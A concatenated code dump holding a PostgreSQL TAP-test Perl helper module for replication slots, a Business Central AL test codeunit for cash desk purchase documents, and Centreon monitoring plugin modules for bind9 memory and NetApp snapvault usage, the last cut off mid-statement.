target_lsn may be any arbitrary lsn, but is typically $primary_node->lsn('insert').
Note that for logical slots, restart_lsn is held down by the oldest in-progress tx.
=cut
sub wait_for_slot_catchup
{
my ($self, $slot_name, $mode, $target_lsn) = @_;
$mode = defined($mode) ? $mode : 'restart';
if (!($mode eq 'restart' || $mode eq 'confirmed_flush'))
{
croak "valid modes are restart, confirmed_flush";
}
croak 'target lsn must be specified' unless defined($target_lsn);
print "Waiting for replication slot "
. $slot_name . "'s "
. $mode
. "_lsn to pass "
. $target_lsn . " on "
. $self->name . "\n";
my $query =
qq[SELECT '$target_lsn' <= ${mode}_lsn FROM pg_catalog.pg_replication_slots WHERE slot_name = '$slot_name';];
$self->poll_query_until('postgres', $query)
or croak "timed out waiting for catchup";
print "done\n";
return;
}
=pod
=item $node->query_hash($dbname, $query, @columns)
Execute $query on $dbname, replacing any appearance of the string __COLUMNS__
within the query with a comma-separated list of @columns.
If __COLUMNS__ does not appear in the query, its result columns must EXACTLY
match the order and number (but not necessarily alias) of supplied @columns.
The query must return zero or one rows.
Return a hash-ref representation of the results of the query, with any empty
or null results as defined keys with an empty-string value. There is no way
to differentiate between null and empty-string result fields.
If the query returns zero rows, return a hash with all columns empty. There
is no way to differentiate between zero rows returned and a row with only
null columns.
=cut
sub query_hash
{
my ($self, $dbname, $query, @columns) = @_;
croak 'calls in array context for multi-row results not supported yet'
if (wantarray);
# Replace __COLUMNS__ if found
substr($query, index($query, '__COLUMNS__'), length('__COLUMNS__')) =
join(', ', @columns)
if index($query, '__COLUMNS__') >= 0;
my $result = $self->safe_psql($dbname, $query);
# hash slice, see http://stackoverflow.com/a/16755894/398670 .
#
# Fills the hash with empty strings produced by x-operator element
# duplication if result is an empty row
#
my %val;
@val{@columns} =
$result ne '' ? split(qr/\|/, $result, -1) : ('',) x scalar(@columns);
return \%val;
}
=pod
=item $node->slot(slot_name)
Return hash-ref of replication slot data for the named slot, or a hash-ref with
all values '' if not found. Does not differentiate between null and empty string
for fields, no field is ever undef.
The restart_lsn and confirmed_flush_lsn fields are returned verbatim, and also
as a 2-list of [highword, lowword] integer. Since we rely on Perl 5.8.8 we can't
"use bigint", it's from 5.20, and we can't assume we have Math::Bigint from CPAN
either.
=cut
sub slot
{
my ($self, $slot_name) = @_;
my @columns = (
'plugin', 'slot_type', 'datoid', 'database',
'active', 'active_pid', 'xmin', 'catalog_xmin',
'restart_lsn');
return $self->query_hash(
'postgres',
"SELECT __COLUMNS__ FROM pg_catalog.pg_replication_slots WHERE slot_name = '$slot_name'",
@columns);
}
=pod
=item $node->pg_recvlogical_upto(self, dbname, slot_name, endpos, timeout_secs, ...)
Invoke pg_recvlogical to read from slot_name on dbname until LSN endpos, which
corresponds to pg_recvlogical --endpos. Gives up after timeout (if nonzero).
Disallows pg_recvlogical from internally retrying on error by passing --no-loop.
Plugin options are passed as additional keyword arguments.
If called in scalar context, returns stdout, and die()s on timeout or nonzero return.
If called in array context, returns a tuple of (retval, stdout, stderr, timeout).
timeout is the IPC::Run::Timeout object whose is_expired method can be tested
to check for timeout. retval is undef on timeout.
=cut
sub pg_recvlogical_upto
{
my ($self, $dbname, $slot_name, $endpos, $timeout_secs, %plugin_options)
= @_;
local %ENV = $self->_get_env();
my ($stdout, $stderr);
my $timeout_exception = 'pg_recvlogical timed out';
croak 'slot name must be specified' unless defined($slot_name);
croak 'endpos must be specified' unless defined($endpos);
my @cmd = (
$self->installed_command('pg_recvlogical'),
'-S', $slot_name, '--dbname', $self->connstr($dbname));
push @cmd, '--endpos', $endpos;
push @cmd, '-f', '-', '--no-loop', '--start';
while (my ($k, $v) = each %plugin_options)
{
croak "= is not permitted to appear in replication option name"
if ($k =~ qr/=/);
push @cmd, "-o", "$k=$v";
}
my $timeout;
$timeout =
IPC::Run::timeout($timeout_secs, exception => $timeout_exception)
if $timeout_secs;
my $ret = 0;
do
{
local $@;
eval {
IPC::Run::run(\@cmd, ">", \$stdout, "2>", \$stderr, $timeout);
$ret = $?;
};
my $exc_save = $@;
if ($exc_save)
{
# IPC::Run::run threw an exception. re-throw unless it's a
# timeout, which we'll handle by testing is_expired
die $exc_save
if (blessed($exc_save) || $exc_save !~ qr/$timeout_exception/);
$ret = undef;
die "Got timeout exception '$exc_save' but timer not expired?!"
unless $timeout->is_expired;
die
"$exc_save waiting for endpos $endpos with stdout '$stdout', stderr '$stderr'"
unless wantarray;
}
};
$stdout =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
$stderr =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
if (wantarray)
{
return ($ret, $stdout, $stderr, $timeout);
}
else
{
die
"pg_recvlogical exited with code '$ret', stdout '$stdout' and stderr '$stderr'"
if $ret;
return $stdout;
}
}
=pod
=back
=cut
1;
| 24.771374 | 141 | 0.68566 |
73ea19f560c64da53d8c31a8e25c81afb8e0c6c9 | 12,739 | al | Perl | Apps/CZ/CashDeskLocalization/test/Src/CashDeskPurchase.Codeunit.al | waldo1001/ALAppExtensions | 935155845bf45b631d1c34b6bcd5aec54308d50f | [
"MIT"
] | 337 | 2019-05-07T06:04:40.000Z | 2022-03-31T10:07:42.000Z | Apps/CZ/CashDeskLocalization/test/Src/CashDeskPurchase.Codeunit.al | snu-development/ALAppExtensions | 371a27fe48483be776642dde19483a87ae27289c | [
"MIT"
] | 14,850 | 2019-05-07T06:04:27.000Z | 2022-03-31T19:53:28.000Z | Apps/CZ/CashDeskLocalization/test/Src/CashDeskPurchase.Codeunit.al | snu-development/ALAppExtensions | 371a27fe48483be776642dde19483a87ae27289c | [
"MIT"
] | 374 | 2019-05-09T10:08:14.000Z | 2022-03-31T17:48:32.000Z | codeunit 148072 "Cash Desk Purchase CZP"
{
Subtype = Test;
TestPermissions = Disabled;
trigger OnRun()
begin
// [FEATURE] [Cash Desk] [Purchase]
isInitialized := false;
end;
var
CashDeskCZP: Record "Cash Desk CZP";
PaymentMethod: Record "Payment Method";
CashDeskUserCZP: Record "Cash Desk User CZP";
LibraryCashDeskCZP: Codeunit "Library - Cash Desk CZP";
LibraryRandom: Codeunit "Library - Random";
LibraryPurchase: Codeunit "Library - Purchase";
LibraryCashDocumentCZP: Codeunit "Library - Cash Document CZP";
CashDocumentActionCZP: Enum "Cash Document Action CZP";
isInitialized: Boolean;
local procedure Initialize()
var
LibraryTestInitialize: Codeunit "Library - Test Initialize";
begin
LibraryTestInitialize.OnTestInitialize(Codeunit::"Cash Desk Purchase CZP");
LibraryRandom.Init();
if isInitialized then
exit;
LibraryTestInitialize.OnBeforeTestSuiteInitialize(Codeunit::"Cash Desk Purchase CZP");
LibraryCashDeskCZP.CreateCashDeskCZP(CashDeskCZP);
LibraryCashDeskCZP.SetupCashDeskCZP(CashDeskCZP, false);
LibraryCashDeskCZP.CreateCashDeskUserCZP(CashDeskUserCZP, CashDeskCZP."No.", true, true, true);
isInitialized := true;
Commit();
LibraryTestInitialize.OnAfterTestSuiteInitialize(Codeunit::"Cash Desk Purchase CZP");
end;
[Test]
procedure CreatingWithdrawalCashDocumentFromPurchaseInvoice()
begin
// [SCENARIO] Create Cash Document in Purchase Invoice
WithdrawalCashDocumentFromPurchaseInvoice(CashDocumentActionCZP::Create);
end;
[Test]
procedure ReleasingWithdrawalCashDocumentFromPurchaseInvoice()
begin
// [SCENARIO] Release Cash Document in Purchase Invoice
WithdrawalCashDocumentFromPurchaseInvoice(CashDocumentActionCZP::Release);
end;
[Test]
procedure PostingWithdrawalCashDocumentFromPurchaseInvoice()
begin
// [SCENARIO] Post Cash Document in Purchase Invoice
WithdrawalCashDocumentFromPurchaseInvoice(CashDocumentActionCZP::Post);
end;
local procedure WithdrawalCashDocumentFromPurchaseInvoice(CashDocumentActionCZP: Enum "Cash Document Action CZP")
var
CashDocumentHeaderCZP: Record "Cash Document Header CZP";
CashDocumentLineCZP: Record "Cash Document Line CZP";
PurchInvHeader: Record "Purch. Inv. Header";
PurchaseHeader: Record "Purchase Header";
PurchaseLine: Record "Purchase Line";
PostedCashDocumentHdrCZP: Record "Posted Cash Document Hdr. CZP";
PostedCashDocumentLineCZP: Record "Posted Cash Document Line CZP";
PostDocNo: Code[20];
begin
Initialize();
// [GIVEN] New Payment method is created and used in Purchase Invoice
LibraryCashDocumentCZP.CreatePaymentMethod(PaymentMethod, CashDeskCZP."No.", CashDocumentActionCZP);
CreatePurchInvoice(PurchaseHeader, PurchaseLine);
ModifyPaymentMethodInPurchaseDocument(PurchaseHeader, PaymentMethod);
// [WHEN] Post Purchase Invoice
PostDocNo := PostPurchaseDocument(PurchaseHeader);
// [THEN] (Posted) Cash Document Withdrawal exists and has correct amount
PurchInvHeader.Get(PostDocNo);
PurchInvHeader.CalcFields("Amount Including VAT");
case CashDocumentActionCZP of
PaymentMethod."Cash Document Action CZP"::Create,
PaymentMethod."Cash Document Action CZP"::Release:
begin
CashDocumentHeaderCZP.SetRange("Cash Desk No.", CashDeskCZP."No.");
CashDocumentHeaderCZP.SetRange("Document Type", CashDocumentHeaderCZP."Document Type"::Withdrawal);
if CashDocumentActionCZP = PaymentMethod."Cash Document Action CZP"::Create then
CashDocumentHeaderCZP.SetRange(Status, CashDocumentHeaderCZP.Status::Open)
else
CashDocumentHeaderCZP.SetRange(Status, CashDocumentHeaderCZP.Status::Released);
CashDocumentHeaderCZP.SetRange("Posting Date", PurchInvHeader."Posting Date");
CashDocumentHeaderCZP.FindLast();
CashDocumentLineCZP.SetRange("Cash Desk No.", CashDocumentHeaderCZP."Cash Desk No.");
CashDocumentLineCZP.SetRange("Cash Document No.", CashDocumentHeaderCZP."No.");
CashDocumentLineCZP.FindFirst();
CashDocumentLineCZP.TestField("Account Type", CashDocumentLineCZP."Account Type"::Vendor);
CashDocumentLineCZP.TestField("Account No.", PurchInvHeader."Buy-from Vendor No.");
CashDocumentLineCZP.TestField(Amount, PurchInvHeader."Amount Including VAT");
CashDocumentLineCZP.TestField("Applies-To Doc. Type", CashDocumentLineCZP."Applies-To Doc. Type"::Invoice);
CashDocumentLineCZP.TestField("Applies-To Doc. No.", PurchInvHeader."No.");
end;
PaymentMethod."Cash Document Action CZP"::Post:
begin
PostedCashDocumentHdrCZP.SetRange("Cash Desk No.", CashDeskCZP."No.");
PostedCashDocumentHdrCZP.SetRange("Document Type", PostedCashDocumentHdrCZP."Document Type"::Withdrawal);
PostedCashDocumentHdrCZP.SetRange("Posting Date", PurchInvHeader."Posting Date");
PostedCashDocumentHdrCZP.FindLast();
PostedCashDocumentLineCZP.SetRange("Cash Desk No.", PostedCashDocumentHdrCZP."Cash Desk No.");
PostedCashDocumentLineCZP.SetRange("Cash Document No.", PostedCashDocumentHdrCZP."No.");
PostedCashDocumentLineCZP.FindFirst();
PostedCashDocumentLineCZP.TestField("Account Type", PostedCashDocumentLineCZP."Account Type"::Vendor);
PostedCashDocumentLineCZP.TestField("Account No.", PurchInvHeader."Buy-from Vendor No.");
PostedCashDocumentLineCZP.TestField(Amount, PurchInvHeader."Amount Including VAT");
end;
end;
end;
[Test]
procedure CreatingReceiptCashDocumentFromPurchaseCrMemo()
begin
// [SCENARIO] Create Cash Documents in Purchase Credit Memo
ReceiptCashDocumentFromPurchaseCrMemo(CashDocumentActionCZP::Create);
end;
[Test]
procedure ReleasingReceiptCashDocumentFromPurchaseCrMemo()
begin
// [SCENARIO] Release Cash Documents in Purchase Credit Memo
ReceiptCashDocumentFromPurchaseCrMemo(CashDocumentActionCZP::Release);
end;
[Test]
procedure PostingReceiptCashDocumentFromPurchaseCrMemo()
begin
// [SCENARIO] Post Cash Documents in Purchase Credit Memo
ReceiptCashDocumentFromPurchaseCrMemo(CashDocumentActionCZP::Post);
end;
local procedure ReceiptCashDocumentFromPurchaseCrMemo(CashDocumentActionCZP: Enum "Cash Document Action CZP")
var
CashDocumentHeaderCZP: Record "Cash Document Header CZP";
CashDocumentLineCZP: Record "Cash Document Line CZP";
PurchCrMemoHdr: Record "Purch. Cr. Memo Hdr.";
PurchaseHeader: Record "Purchase Header";
PurchaseLine: Record "Purchase Line";
PostedCashDocumentHdrCZP: Record "Posted Cash Document Hdr. CZP";
PostedCashDocumentLineCZP: Record "Posted Cash Document Line CZP";
PostDocNo: Code[20];
begin
Initialize();
// [GIVEN] New Payment method is created and used in Purchase Credit Memo
LibraryCashDocumentCZP.CreatePaymentMethod(PaymentMethod, CashDeskCZP."No.", CashDocumentActionCZP);
CreatePurchCreditMemo(PurchaseHeader, PurchaseLine);
ModifyPaymentMethodInPurchaseDocument(PurchaseHeader, PaymentMethod);
// [WHEN] Post Purchase Credit Memo
PostDocNo := PostPurchaseDocument(PurchaseHeader);
// [THEN] (Posted) Cash Document Receipt exists and has correct amount
PurchCrMemoHdr.Get(PostDocNo);
PurchCrMemoHdr.CalcFields("Amount Including VAT");
case CashDocumentActionCZP of
PaymentMethod."Cash Document Action CZP"::Create,
PaymentMethod."Cash Document Action CZP"::Release:
begin
CashDocumentHeaderCZP.SetRange("Cash Desk No.", CashDeskCZP."No.");
CashDocumentHeaderCZP.SetRange("Document Type", CashDocumentHeaderCZP."Document Type"::Receipt);
if CashDocumentActionCZP = PaymentMethod."Cash Document Action CZP"::Create then
CashDocumentHeaderCZP.SetRange(Status, CashDocumentHeaderCZP.Status::Open)
else
CashDocumentHeaderCZP.SetRange(Status, CashDocumentHeaderCZP.Status::Released);
CashDocumentHeaderCZP.SetRange("Posting Date", PurchCrMemoHdr."Posting Date");
CashDocumentHeaderCZP.FindLast();
CashDocumentLineCZP.SetRange("Cash Desk No.", CashDocumentHeaderCZP."Cash Desk No.");
CashDocumentLineCZP.SetRange("Cash Document No.", CashDocumentHeaderCZP."No.");
CashDocumentLineCZP.FindFirst();
CashDocumentLineCZP.TestField("Account Type", CashDocumentLineCZP."Account Type"::Vendor);
CashDocumentLineCZP.TestField("Account No.", PurchCrMemoHdr."Buy-from Vendor No.");
CashDocumentLineCZP.TestField(Amount, PurchCrMemoHdr."Amount Including VAT");
CashDocumentLineCZP.TestField("Applies-To Doc. Type", CashDocumentLineCZP."Applies-To Doc. Type"::"Credit Memo");
CashDocumentLineCZP.TestField("Applies-To Doc. No.", PurchCrMemoHdr."No.");
end;
PaymentMethod."Cash Document Action CZP"::Post:
begin
PostedCashDocumentHdrCZP.SetRange("Cash Desk No.", CashDeskCZP."No.");
PostedCashDocumentHdrCZP.SetRange("Document Type", PostedCashDocumentHdrCZP."Document Type"::Receipt);
PostedCashDocumentHdrCZP.SetRange("Posting Date", PurchCrMemoHdr."Posting Date");
PostedCashDocumentHdrCZP.FindLast();
PostedCashDocumentLineCZP.SetRange("Cash Desk No.", PostedCashDocumentHdrCZP."Cash Desk No.");
PostedCashDocumentLineCZP.SetRange("Cash Document No.", PostedCashDocumentHdrCZP."No.");
PostedCashDocumentLineCZP.FindFirst();
PostedCashDocumentLineCZP.TestField("Account Type", PostedCashDocumentLineCZP."Account Type"::Vendor);
PostedCashDocumentLineCZP.TestField("Account No.", PurchCrMemoHdr."Buy-from Vendor No.");
PostedCashDocumentLineCZP.TestField(Amount, PurchCrMemoHdr."Amount Including VAT");
end;
end;
end;
local procedure CreatePurchDocument(var PurchaseHeader: Record "Purchase Header"; var PurchaseLine: Record "Purchase Line";
DocumentType: Enum "Purchase Document Type"; Amount: Decimal)
var
Vendor: Record Vendor;
begin
LibraryPurchase.CreateVendor(Vendor);
LibraryPurchase.CreatePurchHeader(PurchaseHeader, DocumentType, Vendor."No.");
LibraryPurchase.CreatePurchaseLine(
PurchaseLine, PurchaseHeader, PurchaseLine.Type::"G/L Account", LibraryCashDocumentCZP.GetNewGLAccountNo(true), 1);
PurchaseLine.Validate("Direct Unit Cost", Amount);
PurchaseLine.Modify(true);
end;
local procedure CreatePurchCreditMemo(var PurchaseHeader: Record "Purchase Header"; var PurchaseLine: Record "Purchase Line")
begin
CreatePurchDocument(PurchaseHeader, PurchaseLine, PurchaseHeader."Document Type"::"Credit Memo", LibraryRandom.RandDecInRange(5000, 10000, 2));
end;
local procedure CreatePurchInvoice(var PurchaseHeader: Record "Purchase Header"; var PurchaseLine: Record "Purchase Line")
begin
CreatePurchDocument(PurchaseHeader, PurchaseLine, PurchaseHeader."Document Type"::Invoice, LibraryRandom.RandDecInRange(5000, 10000, 2));
end;
local procedure ModifyPaymentMethodInPurchaseDocument(var PurchaseHeader: Record "Purchase Header"; PaymentMethod: Record "Payment Method")
begin
PurchaseHeader.Validate("Payment Method Code", PaymentMethod.Code);
PurchaseHeader.Modify();
end;
local procedure PostPurchaseDocument(var PurchaseHeader: Record "Purchase Header"): Code[20]
begin
exit(LibraryPurchase.PostPurchaseDocument(PurchaseHeader, true, true));
end;
}
| 50.956 | 151 | 0.678546 |
eda534b51accd98f22eac6196ceed533c7cd7cec | 4,644 | pm | Perl | apps/bind9/web/mode/memoryusage.pm | bmareau/centreon-plugins | 377b2e75b36aaf0ea9c80f4530d1396c7f1c0802 | [
"Apache-2.0"
] | null | null | null | apps/bind9/web/mode/memoryusage.pm | bmareau/centreon-plugins | 377b2e75b36aaf0ea9c80f4530d1396c7f1c0802 | [
"Apache-2.0"
] | null | null | null | apps/bind9/web/mode/memoryusage.pm | bmareau/centreon-plugins | 377b2e75b36aaf0ea9c80f4530d1396c7f1c0802 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2019 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package apps::bind9::web::mode::memoryusage;
use base qw(centreon::plugins::templates::counter);
use strict;
use warnings;
sub custom_usage_perfdata {
my ($self, %options) = @_;
$self->{output}->perfdata_add(label => 'used', unit => 'B',
value => $self->{result_values}->{used},
warning => $self->{perfdata}->get_perfdata_for_output(label => 'warning-' . $self->{label}, total => $self->{result_values}->{total}, cast_int => 1),
critical => $self->{perfdata}->get_perfdata_for_output(label => 'critical-' . $self->{label}, total => $self->{result_values}->{total}, cast_int => 1),
min => 0, max => $self->{result_values}->{total});
}
sub custom_usage_threshold {
my ($self, %options) = @_;
my $exit = $self->{perfdata}->threshold_check(value => $self->{result_values}->{prct_used}, threshold => [ { label => 'critical-' . $self->{label}, exit_litteral => 'critical' }, { label => 'warning-' . $self->{label}, exit_litteral => 'warning' } ]);
return $exit;
}
sub custom_usage_output {
my ($self, %options) = @_;
my ($total_size_value, $total_size_unit) = $self->{perfdata}->change_bytes(value => $self->{result_values}->{total});
my ($total_used_value, $total_used_unit) = $self->{perfdata}->change_bytes(value => $self->{result_values}->{used});
my ($total_free_value, $total_free_unit) = $self->{perfdata}->change_bytes(value => $self->{result_values}->{free});
my $msg = sprintf("Memory Total: %s Used: %s (%.2f%%) Free: %s (%.2f%%)",
$total_size_value . " " . $total_size_unit,
$total_used_value . " " . $total_used_unit, $self->{result_values}->{prct_used},
$total_free_value . " " . $total_free_unit, $self->{result_values}->{prct_free});
return $msg;
}
sub custom_usage_calc {
my ($self, %options) = @_;
$self->{result_values}->{total} = $options{new_datas}->{$self->{instance} . '_total'};
$self->{result_values}->{used} = $options{new_datas}->{$self->{instance} . '_used'};
$self->{result_values}->{free} = $self->{result_values}->{total} - $self->{result_values}->{used};
$self->{result_values}->{prct_used} = $self->{result_values}->{used} * 100 / $self->{result_values}->{total};
$self->{result_values}->{prct_free} = 100 - $self->{result_values}->{prct_used};
$self->{result_values}->{free} = $self->{result_values}->{total} - $self->{result_values}->{used};
return 0;
}
sub set_counters {
my ($self, %options) = @_;
$self->{maps_counters_type} = [
{ name => 'memory', type => 0 }
];
$self->{maps_counters}->{memory} = [
{ label => 'usage', set => {
key_values => [ { name => 'used' }, { name => 'total' } ],
closure_custom_calc => $self->can('custom_usage_calc'),
closure_custom_output => $self->can('custom_usage_output'),
closure_custom_perfdata => $self->can('custom_usage_perfdata'),
closure_custom_threshold_check => $self->can('custom_usage_threshold'),
}
},
];
}
sub new {
my ($class, %options) = @_;
my $self = $class->SUPER::new(package => __PACKAGE__, %options);
bless $self, $class;
$self->{version} = '1.0';
$options{options}->add_options(arguments => {
});
return $self;
}
sub manage_selection {
my ($self, %options) = @_;
my $result = $options{custom}->get_memory();
$self->{memory} = { used => $result->{in_use}, total => $result->{total_use} };
}
1;
__END__
=head1 MODE
Check bind memory usage.
=over 8
=item B<--warning-usage>
Threshold warning.
=item B<--critical-usage>
Threshold critical.
=back
=cut
| 35.450382 | 255 | 0.599914 |
edb260d41ca087866f4f7a11fab8d4ba2197325b | 375 | pl | Perl | cgi-bin/image/index.pl | labroo2/sgn | c8a1a10e4ac2104d82c5fd2d986f1688d01b20be | [
"MIT"
] | 39 | 2015-02-03T15:47:55.000Z | 2022-03-23T13:34:05.000Z | cgi-bin/image/index.pl | labroo2/sgn | c8a1a10e4ac2104d82c5fd2d986f1688d01b20be | [
"MIT"
] | 2,491 | 2015-01-07T05:49:17.000Z | 2022-03-31T15:31:05.000Z | cgi-bin/image/index.pl | labroo2/sgn | c8a1a10e4ac2104d82c5fd2d986f1688d01b20be | [
"MIT"
] | 20 | 2015-06-30T19:10:09.000Z | 2022-03-23T13:34:09.000Z | use CatalystX::GlobalContext qw( $c );
use strict;
use warnings;
use CGI;
use CXGN::DB::Connection;
use CXGN::Login;
my $q = CGI->new();
my $dbh = CXGN::DB::Connection->new();
my $login = CXGN::Login->new($dbh);
my $person_id = $login->has_session();
my ($image_id, $size) = ($q->param("image_id"), $q->param("size"));
print $q->redirect("/image/view/$image_id", 301);
| 19.736842 | 67 | 0.637333 |
ed5c30767c1acb44be339b4b3369f5e39584b24b | 782 | al | Perl | perl/vendor/lib/auto/Net/SSLeay/tcp_read_all.al | ifleeyo180/VspriteMoodleWebsite | 38baa924829c83808d2c87d44740ff365927a646 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/auto/Net/SSLeay/tcp_read_all.al | ifleeyo180/VspriteMoodleWebsite | 38baa924829c83808d2c87d44740ff365927a646 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/auto/Net/SSLeay/tcp_read_all.al | ifleeyo180/VspriteMoodleWebsite | 38baa924829c83808d2c87d44740ff365927a646 | [
"Apache-2.0"
] | null | null | null | # NOTE: Derived from blib\lib\Net\SSLeay.pm.
# Changes made here will be lost when autosplit is run again.
# See AutoSplit.pm.
package Net::SSLeay;
#line 617 "blib\lib\Net\SSLeay.pm (autosplit into blib\lib\auto\Net\SSLeay\tcp_read_all.al)"
sub tcp_read_all {
my ($how_much) = @_;
$how_much = 2000000000 unless $how_much;
my ($n, $got, $errs);
my $reply = '';
my $bsize = 0x10000;
while ($how_much > 0) {
$n = sysread(SSLCAT_S,$got, (($bsize < $how_much) ? $bsize : $how_much));
warn "Read error: $! ($n,$how_much)" unless defined $n;
last if !$n; # EOF
$how_much -= $n;
debug_read(\$reply, \$got) if $trace>1;
$reply .= $got;
}
return wantarray ? ($reply, $errs) : $reply;
}
# end of Net::SSLeay::tcp_read_all
1;
| 28.962963 | 93 | 0.608696 |
ed6fdc635ce483121e450034cfe91a8fb79ee3ca | 9,009 | pm | Perl | storage/netapp/ontap/snmp/mode/snapvaultusage.pm | centreon-lab/centreon-plugins | 68096c697a9e1baf89a712674a193d9a9321503c | [
"Apache-2.0"
] | null | null | null | storage/netapp/ontap/snmp/mode/snapvaultusage.pm | centreon-lab/centreon-plugins | 68096c697a9e1baf89a712674a193d9a9321503c | [
"Apache-2.0"
] | null | null | null | storage/netapp/ontap/snmp/mode/snapvaultusage.pm | centreon-lab/centreon-plugins | 68096c697a9e1baf89a712674a193d9a9321503c | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2022 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package storage::netapp::ontap::snmp::mode::snapvaultusage;
use base qw(centreon::plugins::templates::counter);
use strict;
use warnings;
use centreon::plugins::templates::catalog_functions qw(catalog_status_threshold);
use Digest::MD5 qw(md5_hex);
sub custom_status_output {
my ($self, %options) = @_;
my $msg = 'status : ' . $self->{result_values}->{status} . ' [state : ' . $self->{result_values}->{state} . ']';
return $msg;
}
sub custom_status_calc {
my ($self, %options) = @_;
$self->{result_values}->{status} = $options{new_datas}->{$self->{instance} . '_svStatus'};
$self->{result_values}->{state} = $options{new_datas}->{$self->{instance} . '_svState'};
$self->{result_values}->{display} = $options{new_datas}->{$self->{instance} . '_display'};
return 0;
}
sub set_counters {
my ($self, %options) = @_;
$self->{maps_counters_type} = [
{ name => 'snapvault', type => 1, cb_prefix_output => 'prefix_snapvault_output', message_multiple => 'All snapvault usages are ok', skipped_code => { -10 => 1, -11 => 1 } }
];
$self->{maps_counters}->{snapvault} = [
{ label => 'status', threshold => 0, set => {
key_values => [ { name => 'svState' }, { name => 'svStatus' }, { name => 'display' } ],
closure_custom_calc => $self->can('custom_status_calc'),
closure_custom_output => $self->can('custom_status_output'),
closure_custom_perfdata => sub { return 0; },
closure_custom_threshold_check => \&catalog_status_threshold,
}
},
{ label => 'lag', set => {
key_values => [ { name => 'svLag' }, { name => 'display' } ],
output_template => 'lag : %s seconds',
perfdatas => [
{ label => 'lag', template => '%s', min => 0, unit => 's',
label_extra_instance => 1, instance_use => 'display' },
],
}
},
{ label => 'transfer-traffic', set => {
key_values => [ { name => 'svTotalTransMBs', per_second => 1 }, { name => 'display' } ],
output_template => 'transfer traffic : %s %s/s',
output_change_bytes => 1,
perfdatas => [
{ label => 'transfer_traffic', template => '%.2f',
unit => 'B/s', min => 0, label_extra_instance => 1, instance_use => 'display' },
],
}
},
{ label => 'transfer-succeed', display_ok => 0, set => {
key_values => [ { name => 'svTotalSuccesses' }, { name => 'display' } ],
output_template => 'transfer succeed : %s',
perfdatas => [
{ label => 'transfer_succeed', template => '%s', min => 0,
label_extra_instance => 1, instance_use => 'display' },
],
}
},
{ label => 'transfer-failed', display_ok => 0, set => {
key_values => [ { name => 'svTotalFailures' }, { name => 'display' } ],
output_template => 'transfer failed : %s',
perfdatas => [
{ label => 'transfer_failed', template => '%s', min => 0,
label_extra_instance => 1, instance_use => 'display' },
],
}
},
];
}
sub prefix_snapvault_output {
my ($self, %options) = @_;
return "Snapvault '" . $options{instance_value}->{display} . "' ";
}
sub new {
my ($class, %options) = @_;
my $self = $class->SUPER::new(package => __PACKAGE__, %options, statefile => 1);
bless $self, $class;
$options{options}->add_options(arguments => {
'filter-name:s' => { name => 'filter_name' },
'unknown-status:s' => { name => 'unknown_status', default => '' },
'warning-status:s' => { name => 'warning_status', default => '' },
'critical-status:s' => { name => 'critical_status', default => '' },
});
return $self;
}
sub check_options {
my ($self, %options) = @_;
$self->SUPER::check_options(%options);
$self->change_macros(macros => ['warning_status', 'critical_status', 'unknown_status']);
}
my $map_status = {
1 => 'idle', 2 => 'transferring', 3 => 'pending',
4 => 'aborting', 6 => 'quiescing', 7 => 'resyncing',
12 => 'paused',
};
my $map_state = {
1 => 'uninitialized', 2 => 'snapvaulted',
3 => 'brokenOff', 4 => 'quiesced',
5 => 'source', 6 => 'unknown', 7 => 'restoring',
};
my $mapping = {
svStatus => { oid => '.1.3.6.1.4.1.789.1.19.11.1.4', map => $map_status },
svState => { oid => '.1.3.6.1.4.1.789.1.19.11.1.5', map => $map_state },
svLag => { oid => '.1.3.6.1.4.1.789.1.19.11.1.6' }, # timeticks
svTotalSuccesses => { oid => '.1.3.6.1.4.1.789.1.19.11.1.7' },
svTotalFailures => { oid => '.1.3.6.1.4.1.789.1.19.11.1.9' },
svTotalTransMBs => { oid => '.1.3.6.1.4.1.789.1.19.11.1.11' },
};
sub manage_selection {
my ($self, %options) = @_;
my $oid_svOn = '.1.3.6.1.4.1.789.1.19.1.0';
my $snmp_result = $options{snmp}->get_leef(oids => [$oid_svOn]);
if (!defined($snmp_result->{$oid_svOn}) || $snmp_result->{$oid_svOn} != 2) {
$self->{output}->add_option_msg(short_msg => "snapvault is not turned on.");
$self->{output}->option_exit();
}
my $oid_svSrc = '.1.3.6.1.4.1.789.1.19.11.1.2';
my $oid_svDst = '.1.3.6.1.4.1.789.1.19.11.1.3';
$self->{snapvault} = {};
$snmp_result = $options{snmp}->get_multiple_table(oids => [{ oid => $oid_svSrc }, { oid => $oid_svDst }], return_type => 1, nothing_quit => 1);
foreach my $oid (keys %{$snmp_result}) {
next if ($oid !~ /^$oid_svSrc\.(.*)$/);
my $instance = $1;
my $name = $snmp_result->{$oid_svSrc . '.' . $instance} . '.' . $snmp_result->{$oid_svDst . '.' . $instance};
if (defined($self->{option_results}->{filter_name}) && $self->{option_results}->{filter_name} ne '' &&
$name !~ /$self->{option_results}->{filter_name}/) {
$self->{output}->output_add(long_msg => "skipping snapvault '" . $name . "'.", debug => 1);
next;
}
$self->{snapvault}->{$instance} = { display => $name };
}
if (scalar(keys %{$self->{snapvault}}) <= 0) {
$self->{output}->add_option_msg(short_msg => "No entry found.");
$self->{output}->option_exit();
}
$options{snmp}->load(oids => [
map($_->{oid}, values(%$mapping))
],
